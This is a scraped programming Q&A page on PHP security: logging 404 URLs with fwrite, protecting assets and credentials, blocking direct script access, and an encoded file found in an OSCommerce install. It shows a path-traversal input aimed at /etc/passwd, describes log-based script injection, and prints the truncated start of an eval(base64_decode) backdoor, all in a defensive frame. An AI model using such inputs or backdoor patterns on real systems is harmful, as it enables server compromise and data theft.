Security vulnerabilities in php fwrite? - php

I recently transitioned my companies website over to our in-house servers (Apache) from a hosting companies (IIS). The group that originally built the site did a piss poor job and the entire thing was a mess to migrate. While the move went fairly smoothly, looking at the error_log there are still some missing pages.
Rather than having to continually grep through the error_log for "File does not exist" errors relating to this domain - we have about 15 or so we host on these servers - I was wondering if it might be easier to simply do the following when a 404 error occurs:
redirect to a php page and pass the original URL request
have the new php page dump the URL to a log-ish file
As I type this I am becoming less and less convinced that this is a worthwhile undertaking. Regardless though the underlying question is, are there potential security issues w/using fwrite? Does there need to be any sort of scrubbing of user input if that input is going to be appended to a file? This input would not be going anywhere near a database for whatever that is worth. Thanks in advance.

As long as you are the one defining which file you are writing to (and not determining that from the URL), there should not be much risk : the only thing you'll get from the user is the content you'll write to file, and if you don't execute that file, but just read it, it should be quite OK.
The idea of logging 404 errors this way is not new : I've seen it done quite a few times, and have never faced any major problem with it (biggest problem I saw was a file that became big quite fast, because there were far too many errors ^^ )
For instance, Drupal does a bit of this : 404 errors are logged -- but to a database, so it's easier to analyse them using the web-interface.

Well, just the usual filesystem stuff: don't let the user specify where the file will go: things like script.php?filename=../../../../../../../etc/passwd shouldn't even have a chance of writing to /etc/passwd (also the script shouldn't have FS permissions for that).
Other than that, fwrite() doesn't have any special chars that would allow it to jump into some sort of command mode.
Also, the 404 page is pretty simple (in httpd.conf):
ErrorDocument 404 /error_page.php
and just dump the REQUEST_URL to a file

fwrite should be pretty safe.
Alternatively you can use some access log analyzer which usually lists not found pages.

If all it is doing is writing to disc, the only thing someone from the outside is to get it to write to disc. Obviously, the file name should not be a parameter that gets passed with the invalid url. Some one could try to exploit it by just sending tons of invalid pages requests with really long urls. But they would have to know you were doing this and care enough when there are other ways that would be more effective that are just general attacks.

There is a potential issue to look out for is if you are writing logs as HTML (or other file type that happens to allow code to be embedded). These file are of course vulnerable to XSS attacks.

A common logfile attack is to request URLs containing embedded malicious javascript. These URLs are written directly to a log file which will then execute when anyone views the file in a web browser.
Ensure the file you write cannot be served as HTML by the web server
Consider URL-encoding or HTML-encoding the URLs.

You should already be recording the 404 errors in your error_log.
By all means use a custom error handler to give the user a friendlier error message, but if this site sees any sort of serious throughput, then using fwrite from the script is not a good idea. PHP does not intrinsically have the sort of sophisticated file locking semantics to support concurrent file access - but since the webserver is recording the information for you, why bother?

Related

PHP Sessions: Make non-PHP files require login

I am setting up a little page with a quite simple login-system via PHP Sessions. Business as usual: the correct Username/Password combination sets $_SESSION['login'] to true. When opening /page1.php or /page2.php a few lines of PHP will check the login state.
As I would like to have it nice and secure I would also like to keep unauthorized visitors from accessing files other than .php, for instance my javascript or CSS files.
I thought of a few ways to do that:
htaccess/htpasswd is the most obvious option, but I am searching for something more fancy. You know, having a custom UI etc...
mod_rewrite could redirect everything everything to a PHP-file like fetch.php?url=script.js, which could then execute my PHP before echoing the content of script.js. But this way I would have to mess around with MIME-types and it would bypass all other kinds of htaccess protection. Seems like a security risk to me.
declaring a auto_prepend_file in my .htaccess would do a similar job, yet it does not create any MIME-type problems or security issues. I couldn't really get it to work on my server, probably deactivated by my server-host.
Do you have any additional idea? I assume this is a common problem, so there should be a solution for it. Thanks in advance!
To keep it consistent (not have one login via php and one via basic auth) you'll need to run all your assets through php. However I highly recommend against this from several performance reasons:
Incurrs lot more to latency server files via PHP vs. the server daemon (nginx/apache)
Add unnecessary load on server CPU and memory
Wastes time locking up processes that could be use to serve up more requests
You'll never be able to use a CDN with this logged-in only requirement for
I think the main suggestion in my answer is to rethink what you're doing that requires you're client to be logged in to access CSS and JS assets. Are you putting passwords in the JS or something? If so, I recommend deeper evaluation of your architecture over passing all assets through PHP.

Running PHP code from remote server?

I want to prevent access to the functions file in my Wordpress theme. I thought to hide functions.php by putting it on my server and calling it from the client's server. Is that a workable solution? Is there a better approach?
Why not change permissions? You could also move it to a non-public part of the directory tree and place a fwd file and code. That is how I use wp-config. I don't see why you couldn't do that with functions.php
This is technically possible if your client's server has allow_url_include set. However, it's still a bad idea for four reasons:
Speed: opening another HTTP request and waiting for it to complete every time anyone views your client's site will get slow very fast. It'll also hammer your site.
Security: The PHP file on the remote server (your server, in this case) will need to be printed in plaintext. This could be a bad thing, particularly if you've written customized, potentially-insecure code in it. Coincidentally, this also means that your approach won't actually stop your client from finding out what the script does. There's also nothing stopping the client from loading the URL of your unprotected script, pasting it into his WordPress directory, and altering the include. Additionally, if your server is ever compromised or someone snatches your domain, they can then inject code onto your client's server with impunity.
Ethics: Unless your client is explicitly made aware of this arrangement, it is unethical because if your business relationship terminates he or she will still be vulnerable to code injection, even after terminating your FTP/SSH/WordPress dashboard access.
Reliability: If you do this, any time your site is offline your client's site will die with a messy error message.
Re-homing executable code on your server is probably a really bad idea, and while it is absolutely technically possible, there are many compelling reasons why doing things this way are a bad idea.
If you are trying to protect proprietary code from the client, your only good options are to:
Host his site yourself. This could be profitable down the line if your technology is something that a specialized hosting company could be built around.
Build an API that can grant metered access to your proprietary data or processing, and write a WordPress plugin to talk to the API. This could be profitable down the line both by encouraging developers to write software for your system, and the WordPress plugin would lower the barrier for entry to doing business with you.
You can just put a .htaccess rule that redirects /functions.PHP to your homepage. This is what Facebook does.
Edit: see my comment below.

Is it a security risk to have your database details in a php file accessable via the browser?

I've just had an argument with a colleaque.
My index.php contains my mysql connection and therefor also the host, username, password and database name.
He claims it is a security thread for the possibility exists that the php parser may fail which would cause the webserver to return the entire file as plain text.
I however believe that IF the php parser would fail the webserver would give an internal server error to the users.
Can anyone confirm whether it is or is not a security risk?
thank you.
The short answer is no.
The long answer is yes, but only if:
your server's been compromised, in which case people reading your php files are the least of your worries
you've misconfigured your server to parse .php files and plain text, which would be very silly indeed.
Also, if you're using some kind of version control software, make sure your .hg or .svn or whatever folders can't be viewed from a web browser. You'd be surprised how often that happens.
EDIT:
I would be inclined to go with some of the suggestions on here already, which is what I do in my day to day development. Have a config.php file outside of your web root folder and include this in your index.php. That way you know for sure it's never going to be viewable. Btw, I've been developing in PHP for a number of years and have never had the parser fail in such a way that it's resulted in raw PHP being displayed to an end user.
EDIT 2:
If your colleague is referring to parse errors when he talks about the PHP parser "failing" then in a live environment you should have error reporting disabled anyway.
Either outcome is a possibility. The normal course of action is to use require to bring in a separate file containing your db credentials. That file should be outside the webserver file tree so it can't be reached via a browser.
I'm in the belief that you can never be too safe. What's easier, replacing thousands, possibly millions of records if a hacker gets your db information, the security breach you would have to explain to your users (and possibly their lawyers depending on content and breach) or putting your db information in a separate, password protected folder and including the information on the pages you need the connection?
To me, the choice is simple.
Your co-worker is correct but this is very unlikely to happen. The .php file will only be returned as plain text or as a download if PHP has stopped running on the host.
To be safer, use an include() path to the database credentials in a new folder. In that folder have a .htaccess file with 'deny from all'.
That way even if PHP stops running on the server, Apache will still run and protect all the files including the database credentials. If even apache stops running, the whole webserver will be unreachable and your credentials will still be safe.
:)
Personally I'd put the options in a config file outside the web tree and, once uploaded, remove FTP access from that directory. It's not just a matter of whether the PHP parser fails and drops the file out as plain text BUT if the FTP server has a vulnerability that's compromised that file could be accessed by FTP as well as HTTP.
As long as Apache/PHP is running as a separate user to FTP you can still require the config file from PHP.

Why should I prevent direct access to PHP files that do not echo anything?

For an example if I have a mail script or a script that writes to a database - scripts that do not echo anything important (other than a thank you, or an error message), but do a lot of important back-end work.
What could the possible security concerns from accessing them directly be?
Is it worth preventing direct access to such files?
They are receiving data using $_POST/$_GET sent trough contact forms and then either mailing it or writing it to a DB (in both cases after good validation).
Still, can the data that is being worked with there be accessed somehow (other than cracking my account and downloading them :)), since obviously opening such files in browser will not give any results to the attacker?
Server misconfiguration
The security risk is, in case the web server fails to execute the php file (because configuration was reset), it's source-code will be displayed inside the browser as plain text. And you probably want to prevent that.
Wrong Context
Next to that scenario, another problem is, if the file actually does something with your database data for example, calling the file even w/o any direct output will have influence of indirect output. This is normally unwanted as well.
In your case it sends an email even, so direct requests can be used to send emails. That is probably unwanted as well.
Not to mention the risks this can have in getting your stuff penetrated. Not that this would be the only place where it is possible, but you should keep the surface small.
Improved File-Handling
The best approach however is to store the applications code outside of the webroot, so that those files are never accessible by a direct HTTP request.
You just don't know what the script will do when executed out of context, so first of all, it's a good thing to prevent that from happening. Preferable this is done by setting a variable (or rather a DEFINE) in you entry page and make all other files check if it is set.
Then, it's a good thing to put the other files in a separate directory, outside your document root. This will prevent the scripts from being downloaded. That should never happen, because they are usually parsed, but a single error might cause PHP to be disabled in which case, the php files are fed through Apache as if they are plain text files.
If people can view your code, they may find out about data structure, maybe passwords, and vulnerabilities in your code.
So, if possible, put your files outside your documents root. If you do that, you won't need to check for that define, but it won't hurt if you do.
Like Chris said, if the script accepts any $_GET, $_POST or $_COOKIE parameters, there is the risk of someone being able to easily penetrate your server.
If the script actually performs any actions that might cause problems if run too often or too quickly (like a long-running mail script), you might be an easy target for a DOS attack.
Basically, if the script does anything with anything and should only be called from another script, prevent it from running under any other circumstance. Some OSS projects (Joomla, Wordpress, etc.) use a constant to verify that a file is actually being called from within the application. The constant won't exist if the script is called by a user directly from their browser.
If you don't intend your scripts to be accessed directly, then yes you should probably prevent access. Whether or not they echo anything is beside the point. The bigger problem is that they may still accept input from a user in the form of a $_GET, $_POST, $_SESSION, or $_COOKIE. This could lead to SQL injection amongst other concerns. Furthermore, without the guidance of the main frontend page, the backend scripts may not know how to properly do their job (certain vars may not be set, etc) so very odd behavior could result.
The best thing you could do is put the worrisome php files outside of the htdocs directory, and then use require to pull them in. Obviously you'd need to set up your paths.

Unexpected PHP file showed up in OSCommerce

Was digging through the OSCommerce files on my site and found a file in the /images folder that I don't ever remember seeing before. I haven't checked the original install package, but I suspect this isn't a part of it.
The file is 27kb and called vidovic_pretty.php. It's encoded or compiled in some way, so the contents are unviewable. (see below)
<?eval(base64_decode("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7MjUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7...
Running it displays a single html textbox and a button that says, "Check."
Anyone have any ideas what it is or what it might do?
Thanks
This is most likely something a hacker injected - encoded and minimized. You can echo the result of base64_decode(...) instead of evaluating it to see what it would try to perform. BTW, actually running it was probably a big mistake.
If you can provide the entire string within the base64_decode - Or, actually, instead of calling eval, call echo:
<?echo base64_decode("JGs9M...");
You'll be able to see what it does. But, typically, this is a signature of a backdoor/attacker, etc. I've seen this style before. And the fact its in the images/ directory maybe means they were able to get something like photo.gif.php uploaded ...
Probably not good at all.
Running it displays a single html
textbox and a button that says,
"Check."
Does it post to a page? Maybe the page receives whatever is in the textbox and executes it via system(), exec(), etc....
Definitely a baddie you got there. As others have pointed out, it most probably serves as a nice backdoor for the attacker to run arbitrary commands on your system.
What you should, at a bare minimum, do is:
Notify your tech support and ask for them to find out what the attacker changed and when
If you are on a shared host, move to a dedicated server (or at least a VPS)
Back up your data, verifying it's clean in the process
Roll back to a backup made before the box has been compromised
Apply any and all security patches to the software you have been running, the OS, etc.
Reinstall your scripts then re-import the clean data
I have absolutely no doubt in my mind that you have been hacked. You have discovered a backdoor and you must remove it immediately. These are often put in place by automated attack systems and then a hacker can come back at a later date and assume control over your server or use your server to break into web browsers that visit it. I have cleaned up hacks identical to this before. I'm surprised you aren't on google's walware list, that is usually peoples first indication.
I really want to find out the PHP code that is being eval'ed. Can you post the full base64? Maybe split it up by newlines so it will fit.
In my PHP framework, I do not allow files to be uploaded that apache might know how to execute upon retrieval.
If you must print out a thing like this, do it in a CLI version of PHP, don't send it to your browser! It might also include something that our browser will execute.

Categories